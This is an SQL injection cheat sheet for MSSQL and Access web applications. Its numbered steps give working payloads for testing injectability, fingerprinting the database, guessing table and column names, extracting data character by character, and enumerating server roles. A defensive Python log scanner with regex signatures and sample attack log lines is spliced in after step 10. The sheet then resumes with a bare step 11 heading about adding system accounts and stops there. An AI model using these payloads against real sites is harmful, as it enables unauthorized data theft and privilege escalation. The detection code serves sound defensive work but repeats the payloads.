1. Check whether the parameter is injectable: ;and 1=1 ;and 1=2
2. Preliminary check for MSSQL: ;and user>0
3. Injected parameter is a string: 'and [query condition] and ''='
4. Search parameter that is not filtered: 'and [query condition] and '%25'='
5. Identify the database system:
;and (select count(*) from sysobjects)>0    mssql
;and (select count(*) from msysobjects)>0   access
6. Guess the database name: ;and (select Count(*) from [database name])>0
7. Guess the column: ;and (select Count(column name) from database name)>0
8. Guess the record length of the column: ;and (select top 1 len(column name) from database name)>0
9. (1) Guess the ASCII value of the column (Access):
;and (select top 1 asc(mid(column name,1,1)) from database name)>0
(2) Guess the ASCII value of the column (MSSQL):
;and (select top 1 unicode(substring(column name,1,1)) from database name)>0
10. Test the privilege structure (MSSQL):
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--
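From the defender's side, every probe in steps 1-10 above leaves a recognisable trace in the web server access log. The following Python scanner is an added example, not part of the original cheat sheet: it URL-decodes each log line and tags it with the probe families it contains. The family names and the sample log lines are my own constructions.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the probe families listed in steps 1-10, keyed by a made-up
# family name. They are matched against the URL-decoded, lower-cased line.
PROBE_SIGNATURES = {
    "boolean_probe": re.compile(r"\band\s+1\s*=\s*[12]\b"),                # step 1
    "mssql_user_probe": re.compile(r"\band\s+user\s*>\s*0\b"),             # step 2
    "string_context": re.compile(r"'\s*and\b.*\band\s*'(%|%25)?'\s*="),    # steps 3-4
    "db_fingerprint": re.compile(r"\bfrom\s+m?sysobjects\b"),              # step 5
    "blind_char_extract": re.compile(                                      # step 9
        r"\b(asc\s*\(\s*mid|unicode\s*\(\s*substring)\s*\("),
    "role_enumeration": re.compile(r"\bis_(srvrolemember|member)\s*\("),   # step 10
}

def classify_request(raw_line: str) -> set:
    """Return the set of probe families present in one raw access-log line."""
    decoded = unquote_plus(raw_line).lower()  # one pass: %27 -> ', %2525 -> %25
    return {name for name, rx in PROBE_SIGNATURES.items() if rx.search(decoded)}

def scan_access_log(lines):
    """Return [(line_number, sorted families)] for every line that matched."""
    hits = []
    for number, line in enumerate(lines, start=1):
        families = classify_request(line)
        if families:
            hits.append((number, sorted(families)))
    return hits

# Constructed sample log (not real traffic): a benign request, the page's
# probes in sequence, then another benign request.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01] "GET /news.asp?id=7 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [01/Jan/2024:10:00:02] "GET /news.asp?id=7%20and%201=1 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [01/Jan/2024:10:00:03] "GET /news.asp?id=7%20and%201=2 HTTP/1.1" 200 310',
    '10.0.0.5 - - [01/Jan/2024:10:00:04] "GET /news.asp?id=7%20and%20user%3E0 HTTP/1.1" 500 210',
    '10.0.0.5 - - [01/Jan/2024:10:00:05] "GET /news.asp?id=7%20and%20(select%20count(*)%20from%20sysobjects)%3E0 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [01/Jan/2024:10:00:06] "GET /news.asp?id=7;and%201=(select%20IS_SRVROLEMEMBER(%27sysadmin%27));-- HTTP/1.1" 200 5120',
    '10.0.0.5 - - [01/Jan/2024:10:00:07] "GET /search.asp?q=x%27%20and%20(select%20top%201%20unicode(substring(name,1,1))%20from%20users)%3E0%20and%20%27%2525%27=%27 HTTP/1.1" 200 4000',
    '10.0.0.9 - - [01/Jan/2024:10:00:08] "GET /news.asp?id=8 HTTP/1.1" 200 5200',
]

if __name__ == "__main__":
    for number, families in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(families)}")
```

A run of consecutive hits from one client, moving from boolean_probe through db_fingerprint to role_enumeration, is the sequence this page describes and is worth alerting on as a whole rather than per request.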
11. Add MSSQL and system accounts